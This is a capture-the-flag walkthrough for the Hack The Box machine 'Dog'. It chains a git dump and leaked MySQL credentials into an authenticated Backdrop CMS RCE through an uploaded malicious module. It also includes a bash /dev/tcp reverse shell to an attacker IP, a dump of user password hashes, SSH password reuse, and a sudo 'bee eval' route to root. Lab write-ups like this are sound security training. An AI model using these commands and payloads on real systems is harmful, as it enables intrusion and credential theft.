Dog
Recon
HTTP (80)
From about page we get 2 pieces of information: 1. Domain name, 2. CMS is Backdrop
robots.txt discloses some potential paths
└─$ curl dog.htb/robots.txt -s | grep -v '#'
User-agent: *
Crawl-delay: 10
Disallow: /core/
Disallow: /profiles/
Disallow: /README.md
Disallow: /web.config
Disallow: /admin
Disallow: /comment/reply
Disallow: /filter/tips
Disallow: /node/add
Disallow: /search
Disallow: /user/register
Disallow: /user/password
Disallow: /user/login
Disallow: /user/logout
Disallow: /?q=admin
Disallow: /?q=comment/reply
Disallow: /?q=filter/tips
Disallow: /?q=node/add
Disallow: /?q=search
Disallow: /?q=user/password
Disallow: /?q=user/register
Disallow: /?q=user/login
Disallow: /?q=user/logoutGit Dump
Nmap showed that .git was accessible so dump it
└─$ git-dumper http://dog.htb dog_srcFrom blog we have a username: dogBackDropSystem
https://github.com/FisMatHack/BackDropScan
└─$ curl http://dog.htb/core/profiles/testing/testing.info
name = Testing
description = Minimal profile for running tests. Includes absolutely required modules only.
version = BACKDROP_VERSION
backdrop = 1.x
type = profile
hidden = TRUE
dependencies[] = layout
; Added by Backdrop CMS packaging script on 2024-03-07
project = backdrop
version = 1.27.1
timestamp = 1709862662Backdrop version is 1.27.1
Backdrop Authenticated RCE
Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE)
MySQL Creds:
root:BackDropJ2024DS2024
dogBackDropSystem user didn't work. If we search for domain name inside project source we get a valid user.
└─$ grep '@dog.htb' . -Rain
./files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json:12: "tiffany@dog.htb"
./.git/logs/refs/heads/master:1:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <dog@dog.htb> 1738963331 +0000 commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases
./.git/logs/HEAD:1:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <dog@dog.htb> 1738963331 +0000 commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliasesCreds:
tiffany:BackDropJ2024DS2024
Web Shell
└─$ curl https://www.exploit-db.com/download/52021 -sLo rce.py
└─$ py rce.py http://dog.htb
Backdrop CMS 1.27.1 - Remote Command Execution Exploit
Evil module generating...
Evil module generated! shell.zip
Go to http://dog.htb/admin/modules/install and upload the shell.zip for Manual Installation.
Your shell address: http://dog.htb/modules/shell/shell.phpAbove URL didn't work, but http://10.129.189.5/?q=admin/modules/install worked
The specified file shell.zip could not be uploaded. Only files with the following extensions are allowed: tar tgz gz bz2.└─$ tar -czvf shell.tgz shell/
shell/
shell/shell.info
shell/shell.php
http://dog.htb/modules/shell/shell.php?cmd=id
Reverse Shell
Get reverse shell (because HTB deletes the modules every x minutes and webshell is unusable...)
/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.131/4444 0>&1'(remote) www-data@dog:/var/www/html$ mysql -u root -p'BackDropJ2024DS2024' backdrop -e 'SHOW DATABASES;'
(remote) www-data@dog:/var/www/html$ mysql -u root -p'BackDropJ2024DS2024' backdrop -e 'SHOW TABLES;'
(remote) www-data@dog:/var/www/html$ mysql -u root -p'BackDropJ2024DS2024' backdrop -e 'SELECT * FROM users;'
(remote) www-data@dog:/var/www/html$ mysql -u root -p'BackDropJ2024DS2024' backdrop -e 'SELECT name,pass FROM users;'
mysql: [Warning] Using a password on the command line interface can be insecure.
+-------------------+---------------------------------------------------------+
| name | pass |
+-------------------+---------------------------------------------------------+
| jPAdminB | $S$E7dig1GTaGJnzgAXAtOoPuaTjJ05fo8fH9USc6vO87T./ffdEr/. |
| jobert | $S$E/F9mVPgX4.dGDeDuKxPdXEONCzSvGpjxUeMALZ2IjBrve9Rcoz1 |
| dogBackDropSystem | $S$EfD1gJoRtn8I5TlqPTuTfHRBFQWL3x6vC5D3Ew9iU4RECrNuPPdD |
| john | $S$EYniSfxXt8z3gJ7pfhP5iIncFfCKz8EIkjUD66n/OTdQBFklAji. |
| morris | $S$E8OFpwBUqy/xCmMXMqFp3vyz1dJBifxgwNRMKktogL7VVk7yuulS |
| axel | $S$E/DHqfjBWPDLnkOP5auHhHDxF4U.sAJWiODjaumzxQYME6jeo9qV |
| rosa | $S$EsV26QVPbF.s0UndNPeNCxYEP/0z2O.2eLUNdKW/xYhg2.lsEcDT |
| tiffany | $S$EEAGFzd8HSQ/IzwpqI79aJgRvqZnH4JSKLv2C83wUphw0nuoTY8v |
+-------------------+---------------------------------------------------------+No luck with hashes
➜ .\john-1.9.0-jumbo-1-win64\run\john.exe .\hashes.txt --wordlist=.\wordlist.txtSSH (22)
Password Reuse
Try password reuse:
(remote) www-data@dog:/var/www/html$ grep sh$ /etc/passwd
root:x:0:0:root:/root:/bin/bash
jobert:x:1000:1000:jobert:/home/jobert:/bin/bash
johncusack:x:1001:1001:,,,:/home/johncusack:/bin/bash
└─$ sshpass -p 'BackDropJ2024DS2024' ssh jobert@dog.htb
└─$ sshpass -p 'BackDropJ2024DS2024' ssh johncusack@dog.htb
johncusack@dog:~$ id
uid=1001(johncusack) gid=1001(johncusack) groups=1001(johncusack)Creds:
johncusack:BackDropJ2024DS2024
User.txt
johncusack@dog:~$ cat user.txt
767f04adc441bc96280bfcaf26e33237Privilege Escalation
johncusack@dog:~$ sudo -l
[sudo] password for johncusack:
Matching Defaults entries for johncusack on dog:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User johncusack may run the following commands on dog:
(ALL : ALL) /usr/local/bin/beejohncusack@dog:~$ bee version
✔ Bee for Backdrop CMS - Version 1.x-1.xIn help menu we have eval
ADVANCED
...
eval
ev, php-eval
Evaluate (run/execute) arbitrary PHP code after bootstrapping Backdrop.
...johncusack@dog:~$ sudo bee eval 'system("id")'
✘ The required bootstrap level for 'eval' is not ready.
johncusack@dog:~$ sudo bee --root=/var/www/html eval 'system("id")'
uid=0(root) gid=0(root) groups=0(root)johncusack@dog:~$ sudo bee --root=/var/www/html eval 'system("bash")'
root@dog:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)Root.txt
root@dog:/var/www/html# cat /root/root.txt
82e235d6179edd817b4fdb8c1f7aefe2Last updated